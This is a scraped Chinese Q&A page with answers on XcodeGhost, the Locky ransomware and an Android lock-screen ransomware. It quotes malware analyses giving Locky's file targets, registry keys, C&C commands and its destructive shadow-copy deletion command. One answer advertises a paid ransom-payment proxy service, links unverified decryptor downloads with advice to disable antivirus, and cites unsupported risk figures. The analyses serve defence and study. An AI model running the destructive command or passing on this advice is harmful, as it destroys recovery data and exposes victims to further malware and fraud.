来自子话题：
分享一篇迅雷投毒简单测试：&a href=&///?target=http%3A//gold.xitu.io/entry/56023eabddb263b560c8d254& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&gold.xitu.io/entry/5602&/span&&span class=&invisible&&3eabddb263b560c8d254&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&
分享一篇迅雷投毒简单测试：
来自子话题：
&b&&u&请诸位务必给自己的apple ID添加两步验证，并且不要和他人公用你们的apple ID&/u&&/b&&br&&b&&u&请诸位不要相信那个所谓的作者的澄清，完全就是欲盖弥彰，转移视线，姑且不谈他这一次获得了多少用户的信息，光是他带来的这种新的思路，并且成功的进行了尝试，就足够定性为是一种犯罪行为了。&br&&/u&&/b&&br&这个事件的发生，对于广大用户而言，是一场还没有看到结果的灾难，无论你是否是非越狱用户，无论你是否只从apple store下载APP，问题都如影随形，这不是危言耸听。&br&过去Mac OS也好，iOS也好都是相对比较小众的环境，当然随着苹果手机用户的使用量增加，移动支付和移动互动联网的发展，iOS已经成为了众多不法之徒眼中的香饽饽。&br&过去的病毒形式只是简单的寻找&i&&u&愚蠢的用户&/u&，&/i&而这次的xcode ghost则走了一条完全不同的路线，他寻找&i&&u&愚蠢的守护者&/u&，&/i&这就包括了APP的开发者，APP的审核者。&br&&br&&br&由于整个事件截止到目前为止，还只是在APP里发现了后门，并没有用户实际损失的报告。&br&从损失的角度来讲并没有什么，估计要有阵子才能看到这一次的实际损失有多大。&br&但是，对关键就是但是&br&这是一个分水岭。&br&过去的病毒，需要用户把带着病毒代码的程序安装到目标机器上，需要欺骗用户，而苹果提供了一个非常简单的应对措施，那就是闭环。也就是说，除了越狱的用户，只要你乖乖按照苹果说的做，你就是非常安全的。苹果为你建立了一个坚固的堡垒。&br&而这次XCODE GHOST的作者彻底粉碎了苹果的美梦，它给所有在堡垒外的野兽们提供了一条全新的思路，你不再需要费尽心思去欺骗审核人员，欺骗用户，你只需要收买一个拥有通行证的APP就行了，收买的方法就是给他们加个小尾巴，带着病毒，从大门，正正堂堂的走进去。&br&这，是有毁灭意义的。&br&作为曾经的一名IT行业从业者，信息安全的爱好者，我很佩服这个想法的提出者和实践者的智慧，但是我也很害怕，这么多血腥气散发出去，苹果，乃至整个移动互联网要遭受怎样的打击。&br&----------------------------------------------------------------------------------------------------------&br&说些私心话，我希望如果始作俑者或者相关公司团队被查到的话，能够被逮捕，被判刑，最好一辈子都不要放出来，他们的行为不仅仅是一次信息安全的攻防战，他们给所有有着不良想法的人提供了一个无限可能的方案，这种影响短时间是无法消除的，这不仅仅会影响苹果的生态链，对整个中国的互联网所能造成的伤害都是无法估计的。&br&-----------------------------------------------------------------------------------------------------------------&br&看到所谓的始作俑者的澄清，我只想说，呵呵。&br&挑起了一场战争，然后说自己是无心之举，那么倒是想请他解释一下，为什么要掩盖自己的踪迹，为什么要创建一个名字非常有迷惑性的网站，为什么要获取尝试获取用户的信息，为什么在明知道国内开发者的现状和弱点还非挑着这个弱点处心积虑的去宣传自己篡改过的开发工具？&br&无心之举，仅仅是做个实验，这种借口真的屁用都没有&br&-----------------------------------------------------------------------------------------------------------&br&苹果安卓微软三大家全部中招，无一幸免，我真不知道之前还在为这个作者洗地的那些人脑子里都在想什么，这么有组织有预谋不留痕迹的行为，还说自己无意为之。&br&&b&在此提醒各位用户，勤改密码，不要和他人共享你的账户&/b&
请诸位务必给自己的apple ID添加两步验证，并且不要和他人公用你们的apple ID请诸位不要相信那个所谓的作者的澄清，完全就是欲盖弥彰，转移视线，姑且不谈他这一次获得了多少用户的信息，光是他带来的这种新的思路，并且成功的进行了尝试，就足够定性为是一…
&img src=&/c272a333dd33b1b724af03_b.jpg& data-rawwidth=&950& data-rawheight=&150& class=&origin_image zh-lightbox-thumb& width=&950& data-original=&/c272a333dd33b1b724af03_r.jpg&&&br&网易和新华网同时报道：&a href=&/?target=http%3A///16/0223/15/BGH3H0O.html& class=&internal&&曝&Locky&病毒每小时感染德国5300台计算机&/a&&br&&a href=&/?target=http%3A///world//c_.htm& class=&internal&&勒索者病毒“Locky”每小时感染德国5300台计算机&/a&&br&&br&&b&病毒名称：Locky
（日，LOCKY变种为ZEPTO）&/b&&br&&b&病毒类型：勒索病毒 （黑客勒索的不是法币，而是一种叫bitcoin的匿名货币）&/b&&br&&b&作恶手法：AES或 RSA算法批量加密上百种后缀文件，并且留下勒索信息.&/b&&br&&b&危险等级：★★★★★ （最高级别）&/b&&br&&b&入侵手段：欺骗性邮件，网站插件劫持，中小型甚至大型软件劫持，Windows漏洞，密码侵入，潜伏木马等.&/b&&br&&br&&b&日凌晨更新：国家机构终于关注勒索病毒LOCKY了。 &a href=&///?target=http%3A//www./yubao/yubao_677.htm& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&国家计算机病毒应急处理中心&i class=&icon-external&&&/i&&/a&&/b&&br&广州公安 苏州公安 西安公安 同时转发微博，提醒广大群众预防。&br&&br&&br&&b&日更新：绿盟科技发布个人和企业&Locky“病毒防护方案&a href=&///?target=http%3A///p/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&日&i class=&icon-external&&&/i&&/a&&br&&/b&&br&&br&&b&日更新：带这些E文字眼的陌生邮件，基本可以确认是Locky的欺诈邮件。&/b&&br&&Transaction and Payment Confirmation& -- caught as infected&br&&Invoice &random number&& --caught as infected&br&&scanned invoice& -- this one was not caught due to an infection, but because of a blacklisted country&br&&Order Delay - Package Rev. &random number&& -- caught as infected&br&&Order reference # &random number&& -- caught as infected&br&&Package # &random number&& -- caught as infected&br&&Invoice Copy& -- caught as infected&br&&Invoice& -- caught as infected&br&&Emailing: MX&random alphanumerics& mm.dd.YYYY&-- caught as infected&br&&Notice of appearance in court #&random number&& -- caught as infected&br&以上任何一个邮件内容可能带有你或者你同事的英文名，附件带有JS SCR等可执行文件！！欺骗性极高。&br&&br&&br&&b&日更新：解决方法：查杀病毒源----解密数据----删除勒索信息。&/b&&br&1查杀病毒源建议使用腾讯 &a href=&/?target=http%3A///act/brand/201505btb/%3FADTAG%3Dcop.innercop.sem.btb& class=&internal&&比特币敲诈者&/a&&br&2解密数据只能向黑客支付赎金购买解密私钥，我们强烈建议不要向黑客支付赎金，这样会让黑客更大范围的扩散病毒，请大家不要支付赎金，即使你的数据极其重要，那么也不要让更多人受害。&br&3删除勒索信息 批处理删除即可&br&&br&&b&（关于数据被加密后无法打开，我建议大家使用R-Studio软件先进行数据恢复到被加密之前，有一定的成功率，但是你坚持支付赎金，是一千倍的支持黑客让更多人受害，所以我提议，所有被勒索者不要支付赎金，避让让更多人受到伤害，如果每个人都不支付赎金，那么黑客或许会放弃。） &/b&&br&&br&&br&&b&对于勒索病毒，关注我的LOFTER：&a href=&/?target=http%3A///& class=&internal&&唐平&/a&&br&&/b&&br&(附：关于加密算法更多详情请到维基百科AES：&a href=&/?target=https%3A//zh.wikipedia.org/wiki/%25E9%25AB%%25BA%25A7%25E5%258A%25A0%25E5%25AF%%25A0%%& class=&internal&&https://zh.wikipedia.org/wiki/%E9%AB%98%E7%BA%A7%E5%8A%A0%E5%AF%86%E6%A0%87%E5%87%86&/a&&br&RSA：&a href=&/?target=https%3A//zh.wikipedia.org/wiki/RSA%25E5%258A%25A0%25E5%25AF%%25BC%%25AE%%25B3%2595& class=&internal&&https://zh.wikipedia.org/wiki/RSA%E5%8A%A0%E5%AF%86%E6%BC%94%E7%AE%97%E6%B3%95&/a&）&br&&br&&br&日更新：&b&（新闻）&/b&&br&&b&&a href=&/?target=http%3A//.cn/d/i//doc-ifxqaffy3538320.shtml& class=&internal&&两位密码专家荣获图灵奖:发明公共密钥密码体系&/a&&/b&（新浪新闻）&br&密码学科已经第三次斩获计算机科学最高奖项”图灵奖“&br&分别是：2002年 &a href=&/?target=http%3A///view/1355846.htm& class=&internal&&Ronald L. Rivest&/a&&a href=&/?target=http%3A///view/1355827.htm& class=&internal&&Adi Shamir&/a&&a href=&/?target=http%3A///view/2544578.htm& class=&internal&&Leonard M. Adleman&/a& 的RSA公钥加密学。&br&2012年 Shafi Goldwasser Silvio Micali 的密码学复杂理论领域。&br&日 Whitfield Diffie Martin Hellman 的现代密码学领域及SHA公钥密码体系，同时&br&他们站在了苹果这边反对政府的做法。&br&&br&日更新：&b&Locky 的内在是什么？&/b& （这篇强文深度分析了locky的内在，报告来自美利坚著名却在国内异常低调的杀软malwarebytes. ） 这篇文章似乎在阐述，这是一个完美的勒索病毒产品。&br&链接：&a href=&/?target=https%3A//blog.malwarebytes.org/threat-analysis/2016/03/look-into-locky/& class=&internal&&Look Into Locky Ransomware&/a&&br&同时推荐malwarebytes开发的世界上第一款反勒索病毒软件：&a href=&/?target=https%3A//malwarebytes./s/ivtutyle35gm7lfuk0cjt2tut4r2in0v& class=&internal&&https://malwarebytes./s/ivtutyle35gm7lfuk0cjt2tut4r2in0v&/a&&br&视频：这款反勒索病毒测试病毒样本的效果：&a href=&/?target=http%3A///v_show/id_XMTQ5MjIwMzAwOA%3D%3D.html%3Ffrom%3Ds1.8-1-1.2& class=&internal&&全球首款勒索病毒防护软件测试病毒样本视频&/a&&br&&br&&br&日更新：&br&&b&问：勒索病毒的作者是谁？踢开计算机科学，从社会学，经济学，心理学来考量Cryptowall或locky是个什么类型的病毒？&/b&&br&答：前方高能，高级猿禁入; &a href=&/question//answer/?from=profile_answer_card& class=&internal&&骇客（Cracker）有多可恶？ - 唐平的回答&/a& 这个答案我写出来后，非常多高级码农私信我想了解更多东西，我觉得码农不用过多参与此话题的讨论，如果你是POLICE，请私信联系我，我有大于50%的把握能找出这个黑客或者某个黑客，但是需要更多计算机技术及警方资源方面的帮助。
(注：我更多的认为Locky最多就是个CryptoWall的模仿者）&br&&br&原理参考cryptowall（知乎搜索cryptowall）：&br&&b&日更新：&/b&&br&&b&1：如何查看自己的被勒索了多少钱？&/b&&br&打开你中毒电脑的任意文件夹下面_HELP_instraction.txt 里面有一段中文或者其他语言，目测是根据你的IP来放置不同语言的勒索信。&br&&br&复制里面的奇怪网页到游览器----&br&&br&&img src=&/ee458cd1c86c451d7e3ff9_b.png& data-rawwidth=&596& data-rawheight=&472& class=&origin_image zh-lightbox-thumb& width=&596& data-original=&/ee458cd1c86c451d7e3ff9_r.png&&&img src=&/76af67e568bfb12ea31e5d7c692f206c_b.png& data-rawwidth=&803& data-rawheight=&641& class=&origin_image zh-lightbox-thumb& width=&803& data-original=&/76af67e568bfb12ea31e5d7c692f206c_r.png&&比特币价格查询网站：&a href=&///?target=http%3A///& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&BitcoinWisdom&i class=&icon-external&&&/i&&/a&
如这个3个bitcoin
即时价格是2725，那么3个就是8175大洋。
&br&&b&2&/b&：如何衡量该不该付钱，大家自己做决定了，本人免责 只能帮到你这里了。&br&这里不存在什么对称交易，比特币发过去是不可逆的。大家小心谨慎即可。&br&个人不建议支付并免责，1：助长黑客猖獗:2：不对称交易的风险。&br&&br&&b&3&/b&：&b&紧急情况处理&/b&： 由于Locky会把共享服务器加密，导致很多公司瞬间瘫痪，同时很多个人的紧急情况，又想0风险的处理此事，那我只能做个Low逼事，发个广告，可以通过这里淘宝代付款解密(&a href=&/?target=https%3A///item.htm%3F_u%3Dnv8cmaq4455%26id%3D& class=&internal&&/&/a&)来服务处理。 &br&&br&&b&已经解密成功的私钥共享：&/b&&br&有3个中毒者通过我代办理支付赎金买到了私钥和软件并解密了所有文件，现在通过与中毒者沟通，同意把私钥共享给大家测试，或者有更厉害的童鞋猿反编译，让更多人避免损失：&br&&a href=&/?target=http%3A///s/1dDTPTIx& class=&internal&&/s/1dDTPTIx&/a& （ 等待另外中毒者测试）&br&&a href=&/?target=http%3A///s/1kUnqA8Z& class=&internal&&/s/1kUnqA8Z&/a& （等待另外中毒者测试）&br&&a href=&/?target=http%3A///s/1ntWXAfJ& class=&internal&&/s/1ntWXAfJ&/a& （等待另外中毒者测试）&br&（以上均为通过黑客服务器支付赎金购买的解密软件含私钥，360报毒，倘若测试，需要关闭杀毒软件）&br&数据库被感染，解密进行中&br&&img src=&/1ea0820cfffcdb5440e80_b.jpg& data-rawwidth=&2000& data-rawheight=&2000& class=&origin_image zh-lightbox-thumb& width=&2000& data-original=&/1ea0820cfffcdb5440e80_r.jpg&&&br&&br&&b&以上共享的私钥，是来自其他受害者，当然大家也可以自行购买，但是风险是极大的，&/b&我们跟踪了勒索病毒3年多，里面的坑基本就见过。如果是对bitcoin非常熟悉的老手朋友建议可以自己购买，如果你是新手，千万别去踩这个坑。如果即使你是个bitcoin老手了，那么我依然提醒你近期的hard fork风险，classic和core目前已经算力分叉，小心小心再小心，重要的事情说三遍。&br&日：更新，为什么自行购买比特币去支付赎金的风险大？ &br&1：比特币交易是 你用法币（美元或者人民币）去购买比特币 2：然后你再用比特币支付给黑客。 1所产生的风险是：比特币没有法偿性，交易过程的风险不被法律保护，汇率波动大，交易过程被黑的概率是50%。2：即使你支付了比特币给黑客 同样不能得到私钥的概率是50% ！所有你自行支付赎金成功搞定事情的风险接近风险1和风险2的级数:25%, 属于高风险的行为,倘若你是高风险偏好者，完全可以自己去尝试。 &br&&br&&br&&br&&b&更多高级猿请看这里：关于此LOCKY勒索病毒的更多细节(某网络安全组织的分析）：&/b&&br&1&strong&概述&/strong&&br&&p&我们发现一款新的勒索软件家族，名为“Locky”，它通过RSA-2048和AES-128算法对100多种文件类型进行加密，同时在每个存在加密文件的目录下释放一个名为_Locky_recover_instructions.txt的勒索提示文件。经过分析发现，这是一类利用垃圾邮件进行传播的勒索软件，是首例具有中文提示的比特币勒索软件。&/p&&br&2&strong&样本分析&/strong&&br&&p&&strong&2.1 样本标签&/strong&&br&&/p&&br&&p&病毒名称&/p&&p&Trojan/Win32.Locky.a&/p&&p&原始文件名&/p&&p&ladybi.exe&/p&&p&MD5&/p&&p&FB6CA1CDF6CD2484FEE8C8&/p&&p&处理器架构&/p&&p&X86-32&/p&&p&文件大小&/p&&p&180 KB (184,320 字节)&/p&&p&文件格式&/p&&p&BinExecute/Microsoft.EXE[:X86]&/p&&p&时间戳&/p&&p&42B63E17-&&a href=&tel:&&&/a& 11:55:03&/p&&p&数字签名&/p&&p&NO&/p&&p&加壳类型&/p&&p&无&/p&&p&编译语言&/p&&p&Microsoft Visual C++ 6.0&/p&&p&VT首次上传时间&/p&&p& 10:53:39&/p&&p&VT检测结果&/p&&p&41/55&/p&&br&&p&&strong&2.2 样本功能&/strong&&/p&&br&&p&该勒索软件“Locky”使用绑架用户数据的方法对用户进行敲诈勒索。它通过RSA-2048和AES-128算法对100多种文件类型进行加密，同时在每个存在加密文件的目录下释放一个名为_Locky_recover_instructions.txt的勒索提示文件。&/p&&br&&p&“Locky”样本的本地行为：复制自身到系统临时目录%Temp%下，并重新命名为svchost；对系统中的文件进行遍历，判断文件后缀名是否在样本内置的列表中，若存在，则对样本进行加密操作；在多个文件夹中创建提示文件_Locky_recover_instructions.txt；在桌面上创建文件_Locky_recover_instructions.bmp；并将该文件设置为桌面背景，提示用户如何操作可以成功恢复被加密的文件；添加相关注册表键值；删除系统还原快照。&/p&&br&&p&&strong&?&/strong&&strong&复制自身到%Temp%目录下名为svchost.exe,并添加启动项。&/strong&&/p&&br&&p&&strong&? &/strong&&strong&加密上百种文件类型如下：&/strong&&/p&&p&&strong&.m4u .m3u .mid .wma .flv .3g2 .mkv .3gp .mp4 .mov .avi .asf .mpeg .vob .mpg .wmv .fla .swf .wav .mp3 .qcow2 .vdi .vmdk .vmx .gpg .aes .ARC .PAQ .tar.bz2 .tbk .bak .tar .tgz .gz .7z .rar .zip .djv .djvu .svg .bmp .png .gif .raw .cgm .jpeg .jpg .tif .tiff .NEF .psd .cmd .bat .sh .class .jar .java .rb .asp .cs .brd .sch .dch .dip .pl .vbs .vb .js .asm .pas .cpp .php .ldf .mdf .ibd .MYI .MYD .frm .odb .dbf .db .mdb .sql .SQLITEDB .SQLITE3 .asc .lay6 .lay .ms11 .sldm .sldx .ppsm .ppsx .ppam .docb .mml .sxm .otg .odg .uop .potx .potm .pptx .pptm .std .sxd .pot .pps .sti .sxi .otp .odp .wb2 .123 .wks .wk1 .xltx .xltm .xlsx .xlsm .xlsb .slk .xlw .xlt .xlm .xlc .dif .stc .sxc .ots .ods .hwp .602 .dotm .dotx .docm .docx .DOT .3dm .max .3ds .xml .txt .CSV .uot .RTF .pdf .XLS .PPT .stw .sxw .ott .odt .DOC .pem .p12 .csr .crt .key&/strong&&/p&&br&&p&&strong&? &/strong&&strong&对路径和文件名中包含下列字符串的文件不进行加密：&/strong&&/p&&p&&strong&tmp, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, Windows&/strong&&/p&&br&&p&&strong&? &/strong&&strong&“Locky”添加的注册表项&/strong&&/p&&p&&em&HKCU\Software\Locky&/em&&/p&&p&&em&HKCU\Software\Locky\id&/em&&/p&&p&&em&HKCU\Software\Locky\pubkey&/em&&/p&&p&&em&HKCU\Software\Locky\paytext&/em&&/p&&p&&em&HKCU\Software\Locky\completed&/em&&/p&&p&&em&HKCU\ControlPanel\Desktop\Wallpaper '%UserProfile%\Desktop\_Locky_recover_instructions.bmp'&/em&&/p&&br&&p&&strong&&strong&&strong&? &/strong&&/strong&删除系统还原快照&/strong&&/p&&p&通过调用vssadmin.exeDelete Shadows /All /Quiet 删除全盘所有卷影副本，使受害系统不能够通过卷影副本进行系统还原。&/p&&br&&p&&strong&&strong&&strong&&strong&? &/strong&&/strong&&/strong&网络行为：&/strong&&/p&&ul&&li&&p&向C&C服务器发送被感染机器的部分信息。&/p&&/li&&li&&p&从C&C服务器下载RSA公钥，为后面的加密做准备。&/p&&/li&&li&&p&上传将被加密的文件列表。&/p&&/li&&li&&p&根据系统语言从服务器获取对应的提示信息。&/p&&/li&&/ul&&br&&p&&strong&2.3 相关技术&/strong&&/p&&br&&strong&2.3.1 域名生成算法&/strong&&p&“Locky”样本会首先使用函数rdtsc获取处理器时间，将该值与某变量进行求余运算，通过对该值的判断来决定样本是访问使用算法生成的域名，还是直接访问样本中的硬编码IP地址。这样可以使样本具有一定的随机性。&br&&/p&&img src=&/f7d22163c_b.jpg& data-rawwidth=&692& data-rawheight=&325& class=&origin_image zh-lightbox-thumb& width=&692& data-original=&/f7d22163c_r.jpg&&&br&&br&&br&&p&&strong&图1 域名生成算法&/strong&&/p&&br&&p&域名在生成的时候，需要使用一个随机数，该随机数的计算是根据被感染机器的年月日进行的。&/p&&br&&img src=&/d8f7dcf01b2ef73d448bde3_b.jpg& data-rawwidth=&654& data-rawheight=&310& class=&origin_image zh-lightbox-thumb& width=&654& data-original=&/d8f7dcf01b2ef73d448bde3_r.jpg&&&br&&br&&p&&strong&图2 随机值计算&/strong&&/p&&br&&strong&2.3.2 &/strong&&strong&C&C服务器&/strong&&br&&p&受害主机与服务器是使用HTTP Post请求进行交互。受害主机访问C&C服务器上的main.php，参数有以下几个：&/p&&p&&strong&参数&/strong&&/p&&p&&strong&含义&/strong&&/p&&p&id&/p&&p&随机生成的编号&/p&&p&act&/p&&p&C&C控制命令&/p&&p&affid&/p&&p&会员ID&/p&&p&lang&/p&&p&计算机所使用的语言&/p&&p&corp&/p&&p&未知&/p&&p&serv&/p&&p&未知&/p&&p&os&/p&&p&操作系统&/p&&p&sp&/p&&p&补丁包&/p&&p&x64&/p&&p&是否为64位系统&/p&&p&受害主机所有发出的请求都使用样本中硬编码的key进行加密操作，加密后发送到C&C服务器。从服务器中接收的数据包同样使用特定的加密方法加密，接收到加密数据后，“Locky”会首先进行解密操作。&/p&&br&&p&加密的数据包部分内容：&/p&&br&&img src=&/b2e6d62bfb290a429b9d217_b.jpg& data-rawwidth=&692& data-rawheight=&257& class=&origin_image zh-lightbox-thumb& width=&692& data-original=&/b2e6d62bfb290a429b9d217_r.jpg&&&br&&br&&p&&strong&图3 数据包内容&/strong&&/p&&br&&p&数据包发送时加密的算法：&/p&&img src=&/4a615d55d64a_b.jpg& data-rawwidth=&668& data-rawheight=&417& class=&origin_image zh-lightbox-thumb& width=&668& data-original=&/4a615d55d64a_r.jpg&&&br&&br&&p&&strong&图4 加密算法&/strong&&/p&&br&&p&接收到数据时，样本的解密算法：&/p&&img src=&/4a615d55d64a_b.jpg& data-rawwidth=&668& data-rawheight=&417& class=&origin_image zh-lightbox-thumb& width=&668& data-original=&/4a615d55d64a_r.jpg&&&br&&br&&br&&p&&strong&解密算法&/strong&&/p&&br&&strong&2.3.3 控制命令&/strong&&p&目前所知道的控制命令有四种，分别为：stats、getkey、report、gettext。&/p&&p&&strong&命令&/strong&&/p&&p&&strong&功能&/strong&&/p&&p&stats&/p&&p&发送一些基本信息，如：已成功加密的文件个数、加密失败的文件个数、长度。&/p&&p&getkey&/p&&p&从服务器上下载加密时使用的RSA的公钥。&/p&&p&report&/p&&p&向服务器发送加密的文件列表。&/p&&p&gettext&/p&&p&获取提示用户如何解密的信息，C&C服务器会根据回传的计算机所使用的语言来返回对应的语言提示信息，如：回传zh会返回汉语、回传en会返回英语。&/p&&p&中文的提示信息如下：&/p&&img src=&/e09a62f15dcf649c6e62d1d3b97f61d2_b.jpg& data-rawwidth=&553& data-rawheight=&334& class=&origin_image zh-lightbox-thumb& width=&553& data-original=&/e09a62f15dcf649c6e62d1d3b97f61d2_r.jpg&&&br&&br&3&strong&总结&/strong&&br&&blockquote&&p&通过目前的分析来看，勒索软件“Locky”的功能与之前分析的勒索软件的功能基本一致。勒索软件能给攻击者带来巨大的收益，因其使用比特币进行交易，所以很难追踪；一旦用户感染了勒索软件，只能付费进行解密或是丢弃这些文件。我们提示广大用户，防止数据被加密，更应该注意勒索软件的防御，养成良好的上网使用习惯，不要轻易执行来历不明的文件。&/p&&br&&p&“Locky”和其他勒索软件的目的一致，都是加密用户数据并向用户勒索金钱。与其他勒索软件不同的是，它是首例具有中文提示的比特币勒索软件，这预示着勒索软件作者针对的目标范围逐渐扩大，勒索软件将发展出更多的本地化版本。&/p&&br&&p&预测，今后中国将受到更多类似的勒索软件攻击。所以，如何防御勒索便成为保卫网络安全的重要任务之一。&/p&&/blockquote&
网易和新华网同时报道：病毒名称：Locky （日，LOCKY变种为ZEPTO）病毒类型：勒索病毒 （黑客勒索的不是法币，而是一种叫bitcoin的匿名货币）作恶手法：A…
这种木马软件去年就出现了，有在“安卓吧”的网友应该都听说过”薄荷大神“。（不知道的可以进去了解下&a href=&///?target=http%3A///f%3Fkw%3De%25E5%E5%25BF%%E8%258D%25B7%26ie%3Dutf-8& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&e凉心薄荷吧_百度贴吧&i class=&icon-external&&&/i&&/a&）&br&后来吧友求助与吾爱破解，然后有大神分析了整个过程。&a href=&///?target=http%3A///thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&Android最新敲诈者病毒分析及解锁（11月版）&i class=&icon-external&&&/i&&/a&&br&以下为转载帖子内容：&br&===============================================&br&一、样本信息&br&文件名称：久秒名片赞，(无需积分s)(2)(1)(1).apk&br&文件大小：1497829字节&br&文件类型：application/jar&br&病毒类型：Android.CtLocker&br&样本包名：android.support.v8&br&MD5: B47EF54E3B&br&SHA1: 958B1E341C72DBCFC71A&br&&br&&br&Android敲诈者病毒样本来源于这位坛友&a href=&///?target=http%3A///thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&提示信息
- 吾爱破解论坛&i class=&icon-external&&&/i&&/a&。&br&&br&&br&二、行为分析&br&&br&1.经过AndroidKiller工具反编译、查壳发现，该样本apk程序已经经过爱加密加固过了。但是也奇怪，碰到不少的Android敲诈者病毒从去年到现在，&br&基本都是经过爱加密加固加过壳处理。为了分析该敲诈者病毒，对样本进行&a href=&///?target=http%3A///forum-5-1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&脱壳&i class=&icon-external&&&/i&&/a&处理.。&br&&img src=&/0865d8defa8d8a337e5bf2af7203bf69_b.png& data-rawwidth=&408& data-rawheight=&335& class=&content_image& width=&408&&2.该敲诈者病毒样本的包名为android.support.v8主活动类为android.support.v7.q。&br&&img src=&/10ffd5e9f9_b.png& data-rawwidth=&577& data-rawheight=&163& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/10ffd5e9f9_r.png&&3. 该敲诈者样本Apk被安装运行后，首先获取设备安全管理服务，判断当前主活动组件是否有系统管理员权限；&br&如果当前主活动组件有系统管理员权限，直接将用户的手机进行锁定。&br&&img src=&/a907be5e47cc0bd631b6f0dfe50c9ae7_b.png& data-rawwidth=&577& data-rawheight=&135& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/a907be5e47cc0bd631b6f0dfe50c9ae7_r.png&&4.如果当前主活动组件没有系统管理员权限，则创建新的Activity可视界面活动类android.app.action.ADD_DEVICE_ADMIN，&br&使用诱导性的提示语“请先激活设备管理器”，诱导用户激活设备管理器，用户点击“激活”，激活设备管理器获取系统管理员权限，&br&为用户的手机设置锁屏密码做准备。&br&&img src=&/fe7a1ccb244e368e04da_b.png& data-rawwidth=&576& data-rawheight=&105& class=&origin_image zh-lightbox-thumb& width=&576& data-original=&/fe7a1ccb244e368e04da_r.png&&&img src=&/7bbf4ea7cadae7_b.png& data-rawwidth=&333& data-rawheight=&488& class=&content_image& width=&333&&5.对这个作者很无语，如果用户点击“激活”，激活了用户手机的设备管器，获取系统权限则该病毒apk程序会为用户的手机设置固定值的锁机密码，&br&经过解密后得到锁机密码为&4650&；如果用户没有点击激活，则该样本apk会死循环调用显示设备激活管理器界面，直到用户点击激活导致手机被锁屏密码锁定为止。&br&&img src=&/e7cfb2efcddeeb054fcaa2_b.png& data-rawwidth=&577& data-rawheight=&180& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/e7cfb2efcddeeb054fcaa2_r.png&&&img src=&/291b0e1f4_b.png& data-rawwidth=&332& data-rawheight=&496& class=&content_image& width=&332&&&br&6.该病毒的作者还设置了另外一组手机锁屏的密码，但是经过分析发现，用病毒作者的字符串解密代码解密出来的手机锁屏密码是空。&br&&img src=&/c8bb1c8f7ad3a42acecc9b1d_b.png& data-rawwidth=&577& data-rawheight=&175& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/c8bb1c8f7ad3a42acecc9b1d_r.png&&7.但是请注意，即使解锁了手机的锁屏密码，但是一旦用户的手机重启、手机的通话状态发生改变、手机的网络状态发生改变、屏幕横竖屏发生切换、&br&WIFI的状态发生改变等，用户的手机又会被全屏界面活动类锁定，不能正常使用。&br&&img src=&/eab45c380fc84adb6f2b0e6_b.png& data-rawwidth=&577& data-rawheight=&286& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/eab45c380fc84adb6f2b0e6_r.png&&8.由于该病毒apk程序，静态注册了上面截图中提到的很多广播；因此，一旦有这些广播发出，该apk程序就会高优先级的调用广播接收者&android.support.v7.BootBroadcastReceiver&。&br&&img src=&/6c727ebd3e_b.png& data-rawwidth=&576& data-rawheight=&303& class=&origin_image zh-lightbox-thumb& width=&576& data-original=&/6c727ebd3e_r.png&&&br&&br&9. 广播接收者&android.support.v7.BootBroadcastReceiver&则会启动全屏界面透明的活动类&android.support.v7.MainActivity&，将用户的手机再次锁定，导致用户的手机不能正常使用并且还会播放一段音乐。&br&&img src=&/10bd7ebba4e85c40fae557dc8b35ad01_b.png& data-rawwidth=&577& data-rawheight=&378& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/10bd7ebba4e85c40fae557dc8b35ad01_r.png&&&img src=&/a8a0fee311fd2cf68b5c4c2fbfc2e50f_b.png& data-rawwidth=&293& data-rawheight=&404& class=&content_image& width=&293&&10.估计病毒作者业务做得太大了，需要将&薄荷心凉i&发送到病毒作者的手机上才知道是自己的那款Android敲诈者病毒将用户的手机锁机了。&br&&img src=&/a65afac8e4bbd325c428dde947e5fea0_b.png& data-rawwidth=&577& data-rawheight=&221& class=&origin_image zh-lightbox-thumb& width=&577& data-original=&/a65afac8e4bbd325c428dde947e5fea0_r.png&&11.经过分析发现，解锁用户手机锁定的密码是字符串&薄荷终究是心凉&，思考分析了一下午，但是觉得解锁密码有些蹊跷。&br&&img src=&/ac069f9dfe93af62def9b_b.png& data-rawwidth=&576& data-rawheight=&337& class=&origin_image zh-lightbox-thumb& width=&576& data-original=&/ac069f9dfe93af62def9b_r.png&&12.这里要提到的是，手机的锁屏解密后，过一段时间0x3B9AC9FF时间单位后，11中提到的锁机密码会自动消失解机，但是用户等不到那个时间。&br&&img src=&/0d9c130a2fc56f1ecc9ae7_b.png& data-rawwidth=&576& data-rawheight=&190& class=&origin_image zh-lightbox-thumb& width=&576& data-original=&/0d9c130a2fc56f1ecc9ae7_r.png&&13.即使有幸手机没有被锁定，但是在用户手机屏幕上，创建顶层显示忽略界面屏幕装饰、不允许获得焦点的悬浮窗口，&br&导致用户的手机上总是有一个透明状的悬浮窗口，卸载病毒apk即可去掉该浮窗。&br&&img src=&/fea393c65a8_b.png& data-rawwidth=&576& data-rawheight=&175& class=&origin_image zh-lightbox-thumb& width=&576& data-original=&/fea393c65a8_r.png&&&img src=&/6bcf0ab4a6c9a7c467d19_b.png& data-rawwidth=&349& data-rawheight=&250& class=&content_image& width=&349&&号外：&br&不浪费时间了，关于密码的事情的正确性就留给大家去确认了，脱壳后的dex文件留给大家去分析。很奇怪，这位坛友&a href=&///?target=http%3A///thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&提示信息
